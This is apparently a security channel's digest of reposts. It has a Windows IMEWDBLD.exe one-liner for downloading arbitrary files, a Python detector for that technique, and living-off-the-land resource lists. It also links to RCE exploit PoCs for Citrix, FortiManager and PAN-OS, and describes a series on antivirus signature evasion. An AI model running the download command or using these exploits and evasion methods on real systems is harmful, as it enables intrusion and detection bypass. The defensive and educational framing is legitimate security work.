Source Byte
Only the sober can shun love; the nature I have does not mix with reason. (Saadi Shirazi)
Repost from Source Byte
LOLBin for Downloading Arbitrary Files
C:\Windows\System32\IME\SHARED\IMEWDBLD.exe <URL>
Find the downloaded file in
%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>\<FILENAME>[1].<EXTENSION>
#windows
#redteam
#lolbin
———
@islemolecule_source
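As an added defender-side example (not from the original post), the following Python flags process-creation events in which IMEWDBLD.exe is launched with a URL argument and recognises the INetCache artifact path described above. Field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage); the events are constructed sample data, and tolerating extra folders such as IE\ under INetCache is an assumption.

```python
import re
import ntpath

# Constructed sample events (not real telemetry), Sysmon Event ID 1 style.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\IME\SHARED\IMEWDBLD.exe",
     "CommandLine": r'"C:\Windows\System32\IME\SHARED\IMEWDBLD.exe" https://files.example.invalid/tool.bin',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\IME\SHARED\IMEWDBLD.exe",   # benign: no URL argument
     "CommandLine": r'"C:\Windows\System32\IME\SHARED\IMEWDBLD.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",                # unrelated process
     "CommandLine": r"notepad.exe https://example.invalid/notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# <FILENAME>[n].<EXT> inside an 8-character alphanumeric INetCache subfolder, as in the
# post; intermediate folders (e.g. IE\) are tolerated as an assumption.
INETCACHE_RE = re.compile(
    r"\\INetCache\\(?:[^\\]+\\)*[A-Za-z0-9]{8}\\[^\\]+\[\d+\]\.[A-Za-z0-9]+$",
    re.IGNORECASE,
)


def is_imewdbld_download(event):
    """True when the image is IMEWDBLD.exe and its command line carries a URL."""
    image = ntpath.basename(event.get("Image", "")).lower()
    if image != "imewdbld.exe":
        return False
    return URL_RE.search(event.get("CommandLine", "")) is not None


def flag_events(events):
    """Return (parent image, URL) for every suspicious IMEWDBLD.exe launch."""
    hits = []
    for ev in events:
        if is_imewdbld_download(ev):
            url = URL_RE.search(ev["CommandLine"]).group(0)
            hits.append((ntpath.basename(ev.get("ParentImage", "")), url))
    return hits


def looks_like_inetcache_artifact(path):
    """True for a path matching the download location described in the post."""
    return INETCACHE_RE.search(path) is not None


if __name__ == "__main__":
    for parent, url in flag_events(SAMPLE_EVENTS):
        print(f"IMEWDBLD.exe download spawned by {parent}: {url}")
```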
LOLOL
Living Off the Living Off the Land
- https://br0k3nlab/lofp/
  Living off the False Positive: an autogenerated collection of false positives sourced from some of the most popular rule sets. The information is categorized along with ATT&CK techniques, rule source, and data source.
- https://loldrivers.io
  Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks.
- https://gtfobins.github.io
  GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
- https://lolbas-project.github.io
  The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.
- https://lots-project.com
  Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites on the site allows attackers to use their domain or subdomain.
- https://filesec.io
  File extensions being used by attackers.
- https://hijacklibs.net
  This project provides a curated list of DLL Hijacking candidates.
- https://wadcoms.github.io
  WADComs is an interactive cheat sheet containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.
- https://www.loobins.io
  Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in macOS binaries and how they can be used by threat actors for malicious purposes.
- https://lolapps-project.github.io
  This project was made because exploitation isn't limited to binaries using command line techniques. Both built-in and third-party applications have been used and abused for adversarial gain since the dawn of time, and knowing these methods can help when all else fails.
- https://www.bootloaders.io
  Curated list of known malicious bootloaders for various operating systems. The project aims to assist security professionals in staying informed and mitigating potential threats associated with bootloaders.
- Bring Your Own Land (BYOL)
- https://lothardware.com.tr
  Living Off The Hardware is a resource collection that provides guidance on identifying and utilizing malicious hardware and malicious devices.
- https://wtfbins.wtf/
  WTFBin is a binary that behaves exactly like malware, except, somehow, it's not.
- https://lofl-project.github.io
  Living Off the Foreign Land (LOFL) are LOFL Cmdlets and Binaries (LOFLCABs) that are capable of performing activities from the local (Offensive Windows) system to a REMOTE system.
- https://persistence-info.github.io
  This contains information about Windows persistence mechanisms to make protection/detection more efficient.
- https://github.com/WithSecureLabs/lolcerts
  Threat actors are known to sign their malware using stolen, or even legally acquired, code signing certificates. This project aims at collecting the details of the certificates that are known to be abused in the wild by malicious actors.
- https://boostsecurityio.github.io/lotp/
  Inventory of how development tools (typically CLIs), commonly used in CI/CD pipelines, have lesser-known RCE-By-Design features ("foot guns"), or more generally can be used to achieve arbitrary code execution by running on untrusted code changes or following a workflow injection.
- https://lolbins-ctidriven.vercel.app/
  This project aims to help cyber defenders understand how LOLBin binaries are used by threat actors during an intrusion, in a graphical and digestible format.
- https://lolesxi-project.github.io/LOLESXi/
  This project features a comprehensive list of binaries/scripts natively available in VMware ESXi that adversaries have utilised in their operations.
- https://lolrmm.io/
  This project is a curated list of Remote Monitoring and Management (RMM) tools that could potentially be abused by threat actors.
#lolbins
🖨 Living Off The Land
- https://lolapps-project.github.io
- LOLAD
- UNIX binaries
- Windows binaries
- A collection of resources to thrive off the land
#lolbins
Mimikatz
Mimikatz is a software tool used for process manipulation, written primarily in the C programming language by Benjamin Delpy. It enables direct object manipulation and execution via various techniques. Mimikatz is widely used for bypassing security mechanisms, including EDR (Endpoint Detection and Response) software and antivirus tools, and has a number of features designed to assist with penetration testing and exploitation.
https://github.com/gentilkiwi/mimikatz
Repost from APT IRAN (Research Center)
WatchTowr POCs:
CVE-2024-8068 & CVE-2024-8069 : Citrix Virtual Apps and Desktops (XEN) $versions - Unauthenticated Remote Code Execution (Chain)
POC/AN : https://github.com/watchtowrlabs/Citrix-Virtual-Apps-XEN-Exploit
CVE-2024-47575 : Fortinet FortiManager 'Fgfmsd' $versions Unauthenticated Remote Code Execution (AKA FortiJump)
POC/AN : https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
CVE-2024-0012 & CVE-2024-9474 : PAN-OS $versions - Authentication Bypass LPE Root Command Injection (AKA Sslvpn _ Chain)
POC/AN : https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012/
@APTIRAN
Repost from OnHex
🔴 You have probably heard that antivirus products detect malware through a set of signatures.
In this video, hoagie hacks explains exactly what a signature is and how antivirus products such as Microsoft Defender use them to detect malware.
To demonstrate this, he implements a very simple shellcode injection in C++ and then identifies and removes the signatures that cause the malware to be detected on VirusTotal.
These videos are going to be released as a series; in later parts he will also implement string/API hashing and metamorphic/polymorphic code techniques.
The goal of these videos is to improve red-team skills and to familiarize blue teams with these techniques so they can defend against them.
#RedTeam #BlueTeam #Antivirus #MalwareDevelopment
#redteam #Blueteam #MalwareDev #AV
🆔 @onhex_ir
How to Investigate Insider Threats (Forensic Methodology)
https://www.inversecos.com/2022/10/how-to-investigate-insider-threats.html
Find their #ttp
COM Object - Part 1
Confirm the concept of COM objects through practice and check how to find a vulnerable COM object.
https://hackyboiz.github.io/2024/11/24/ogu123/COM_Object/
Cyber Threat Intelligence (CTI): A Clear Process for Data Ingestion and Distribution
https://medium.com/@philiphristoff/cyber-threat-intelligence-cti-a-clear-process-for-data-ingestion-and-distribution-1889f6a2c5a8
Take a look into the depths of Windows kernels and reveal more than 60000 undocumented structures
https://www.vergiliusproject.com/
Repost from Cyber Detective
Wayback Machine collection search
twitter.com/BanPangar shared a method for finding emails/nicknames mentioned in the text of web pages/docs with the archive.org collection search. It helps find a lot of things that don't show up in Google results.
Don't forget the quotes.
#osint
Repost from Go Casts 🚀
I was looking for some resources on golang internals and came across this repository; it introduces good links organized by topic. Take a look if you are interested.
A collection of articles and videos to understand Golang internals.
https://github.com/emluque/golang-internals-resources
@gocasts